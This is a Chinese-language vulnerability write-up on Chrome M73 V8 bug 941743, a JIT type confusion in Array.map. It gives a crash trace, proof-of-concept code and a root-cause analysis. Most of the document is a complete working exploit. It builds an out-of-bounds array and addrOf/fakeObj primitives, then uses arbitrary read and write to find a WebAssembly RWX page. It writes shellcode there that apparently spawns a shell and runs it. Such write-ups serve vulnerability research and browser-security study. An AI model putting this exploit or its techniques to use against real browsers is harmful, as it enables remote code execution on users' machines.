Chrome M73 issue 941743

漏洞分析
, ,

1. bug info

这是科恩实验室19年 blackhat USA议题中那套利用的rce部分,v8 JIT优化的漏洞。

类型混淆漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
➜  ~ ~/v8/v8/out/x64.debug/d8    ~/chrome_M73_crbug941743_RCE/raw_poc.js 


#
# Fatal error in ../../src/elements.cc, line 881
# Debug check failed: IsFastElementsKind(from_kind).
#
#
#
#FailureMessage Object: 0x7fff3b6caa70
==== C stack trace ===============================

    /home/jack/v8/v8/out/x64.debug/libv8_libbase.so(v8::base::debug::StackTrace::StackTrace()+0x1e) [0x7f95be106e1e]
    /home/jack/v8/v8/out/x64.debug/libv8_libplatform.so(+0x2d527) [0x7f95be0ac527]
    /home/jack/v8/v8/out/x64.debug/libv8_libbase.so(V8_Fatal(char const*, int, char const*, ...)+0x218) [0x7f95be0f4fb8]
    /home/jack/v8/v8/out/x64.debug/libv8_libbase.so(+0x349fc) [0x7f95be0f49fc]
    /home/jack/v8/v8/out/x64.debug/libv8_libbase.so(V8_Dcheck(char const*, int, char const*)+0x32) [0x7f95be0f5092]
    /home/jack/v8/v8/out/x64.debug/libv8.so(+0x1585f80) [0x7f95bcf27f80]
    /home/jack/v8/v8/out/x64.debug/libv8.so(+0x1582a31) [0x7f95bcf24a31]
    /home/jack/v8/v8/out/x64.debug/libv8.so(+0x1a8b5b8) [0x7f95bd42d5b8]
    /home/jack/v8/v8/out/x64.debug/libv8.so(v8::internal::Runtime_TransitionElementsKind(int, unsigned long*, v8::internal::Isolate*)+0x117) [0x7f95bd42d247]
    /home/jack/v8/v8/out/x64.debug/libv8.so(+0x212bd00) [0x7f95bdacdd00]
Received signal 4 ILL_ILLOPN 7f95be104581
[1]    8542 illegal hardware instruction (core dumped)  ~/v8/v8/out/x64.debug/d8 ~/chrome_M73_crbug941743_RCE/raw_poc.js

2. poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
// Impact version: 6.1.462+ 
var arr = [1];
for (var i = 1; i < 300; ++i) {
    var a2 = arr.map(function (v, i) {
        arr.push(1);
    });
    arr.some(arr.constructor);
    for (var j = 0; j < 1000000; ++j) {}
}
``` 

1. array.map 方法,对array中每个元素执行参数指定的操作,然后返回一个新的数据
2. array.some 方法,是一个检测


![](	https://blogimg-10065924.cos.ap-shanghai.myqcloud.com/Chrome-M73-issue-941743/15904645923418.jpg)



这个patch在这个漏洞修补的commit里是有的,就这个poc:

```javascript
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --noenable-slow-asserts

// This call ensures that TurboFan won't inline array constructors.
Array(2**30);
// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
function mapping(a) {
  return a.map(v => v);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1,0);
a.push(2);
a.length += 500;
// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
mapping(a);

3. bug analysis

作者的分析:

  1. The optimization of JSCreateArray (for |a2|) bailout at typed lowering phase. When executing JITed code, it calls to |Runtime_NewArray|.
  2. There’s a CheckMaps for |arr|, but it can’t ensure an array that produced by |arr| is the same type. For example, |arr| is extended by |push| and it has PACKED_SMI_ELEMENTS, but |a2| could be constructed by |Runtime_NewArray| and it could have DICTIONARY_ELEMENTS.
  3. TransitionAndStoreElement assumes the source array should be HOLEY_SMI_ELEMENTS, this can’t ensure either. Because when calling to |Runtime_NewArray| and array’s actual length >= 0x4000000, there’ll be a dictionary elements array. So our bug occurs.

issue-941743-cve-2019-5825

为什么开始需要一个 Array(2 ** 30)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if (argv.length() == 1) {
  Handle<Object> argument_one = argv.at<Object>(0);
  if (argument_one->IsSmi()) {
    int value = Handle<Smi>::cast(argument_one)->value();
    if (value < 0 ||
        JSArray::SetLengthWouldNormalize(isolate->heap(), value)) {
      // the array is a dictionary in this case.
      can_use_type_feedback = false;
    } else if (value != 0) {
      holey = true;
      if (value >= JSArray::kInitialMaxFastElementArray) {
        can_inline_array_constructor = false;
      }
    }
  } else {
    // Non-smi length argument produces a dictionary
    can_use_type_feedback = false;
  }
}

所以只要can_use_type_feedback = false; 即可。

4. how to exploit?

构造oobarray,利用oobarray去修改后面arraybuffer长度用来任意地址读写,利用oobarray读写leak_obj实现addroffakeobj原语。s

5. exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211

/*

    exploit for crbug-941743

*/

is_in_v8_flag = true;

// =================================================================
// tookit
// =================================================================
var g_buffer = new ArrayBuffer(16);
var g_float64 = new Float64Array(g_buffer);
var g_uint64 = new BigUint64Array(g_buffer);


function float2address(f) {
  g_float64[0] = f;
  return g_uint64[0];
}


function address2float(addr) {
  let i = BigInt(addr);
  g_uint64[0] = i;
  return g_float64[0];
}


function hex(i) {
  return '0x' + i.toString(16).padStart('0');
}


function info(msg) {
  console.log('[+] ' + msg);
}

function error(msg) {
  console.log('[-] ' + msg);
  exit(1);
}

function gc() {
  for (let i = 0; i < 100; i++) {
    new ArrayBuffer(0x100000);
  }
}

function myprint(msg){
    if(is_in_v8_flag){
        print(msg);
    }else{
        console.log(msg);
    }
}


// =================================================================
// exploit part
// =================================================================

var max_iters = 10000;
var max_search = 0x10000;

Array(32760);

// This call ensures that TurboFan won't inline array constructors.
Array(2**30);
// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];

let oob_array;
let leak_obj;
let rw_arraybuffer;
let obj = {}; //using for leak_obj

let oob_array_length_offset = 23;  // get this by debugging
let oob_array_storage_length_offset = oob_array_length_offset - 6;


function inline(){
    return a.map(
        (value, index) =>{
            if (index == 0){
                oob_array = [1.1, 2.2];

                leak_obj = {m:address2float(0xdeadbeef), n:obj};
                rw_arraybuffer = new ArrayBuffer(0x4321);
            }
            if (index == oob_array_length_offset +1 ){
                throw "oob finished..."
            }
            return index;
        });
}

inline();
for(var i = 0; i < max_iters; ++i) inline();

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1, oob_array_storage_length_offset, oob_array_storage_length_offset + 1);
a.fill(1, oob_array_length_offset);
a.length += 500;


leak_obj_offset = 0;
rw_arraybuffer_offset = 0;

function addrOf(obj){
    leak_obj.n = obj;
    return Number(float2address(oob_array[leak_obj_offset]));
}

function fakeObj(obj_address){
    oob_array[leak_obj_offset] = Number(float2address(obj_address));
    return leak_obj.n;
}

function read64(addr){
    oob_array[rw_arraybuffer_offset] = address2float(addr);
    let data_view = new DataView(rw_arraybuffer);
    return Number(float2address(data_view.getFloat64(0, true)));
}

// function write64(addr, value){
//     oob_array[rw_arraybuffer_offset] = address2float(addr);
//     let data_view = new DataView(rw_arraybuffer);
//     data_view.setFloat64(0, float2address(value), true);
// }

function write32(addr, value){
    oob_array[rw_arraybuffer_offset] = address2float(addr);
    let data_view = new DataView(rw_arraybuffer);
    data_view.setInt32(0, value, true);
}

var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1,
127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0,
1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2,
0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 10, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var func = wasmInstance.exports.main;


try{
    inline();
}catch(e){
    if(oob_array.length > 2){
        myprint("[+] oob successed!");
        myprint("[+] oob_array length is : " + oob_array.length);
    }else{
        throw "oob Failed"
    }

    for(var i = 0; i < max_search; ++i){
        var value = float2address(oob_array[i]);
        if(value == 0xdeadbeef){
            leak_obj_offset = i + 1;
            break;
        }
    }

    for(var i = 0; i < max_search; ++i){
        var value = float2address(oob_array[i]);
        if(value == 0x4321){
            rw_arraybuffer_offset = i + 1;
            break;
        }
    }

    if(leak_obj_offset == 0 || rw_arraybuffer_offset==0) throw "get offset failed"

    myprint("[+] leak_obj_offset : " + leak_obj_offset);
    myprint("[+] rw_arraybuffer_offset : " + rw_arraybuffer_offset);

    var wasm_func_addr = addrOf(func) - 1;
    myprint("[+] wasm func addr : " + hex(wasm_func_addr));

    var shared_info = read64(wasm_func_addr + 0x18) - 1;
    myprint("[+] wasm shared info : " + hex(shared_info));

    var data_address = read64(shared_info + 0x8) - 1;
    myprint("[+] data_address : " + hex(data_address));

    var instance_address = read64(data_address + 0x10) - 1;
    myprint("[+] instance_address : " + hex(instance_address));

    var rwx_address = read64(instance_address + 0x108);
    myprint("[+] rwx_address : " + hex(rwx_address));
    // %DebugPrint(func);
    // %SystemBreak();

    write32(rwx_address, 0x99583b6a);
    write32(rwx_address + 0x4, 0x2fbb4852);
    write32(rwx_address + 0x8, 0x6e69622f);
    write32(rwx_address + 0xc, 0x5368732f);
    write32(rwx_address + 0x10, 0x57525f54);
    write32(rwx_address + 0x14, 0x050f5e54);

    // %SystemBreak();
    // let's go to the shellcode 
    func();

}


6. reference

crbug-941743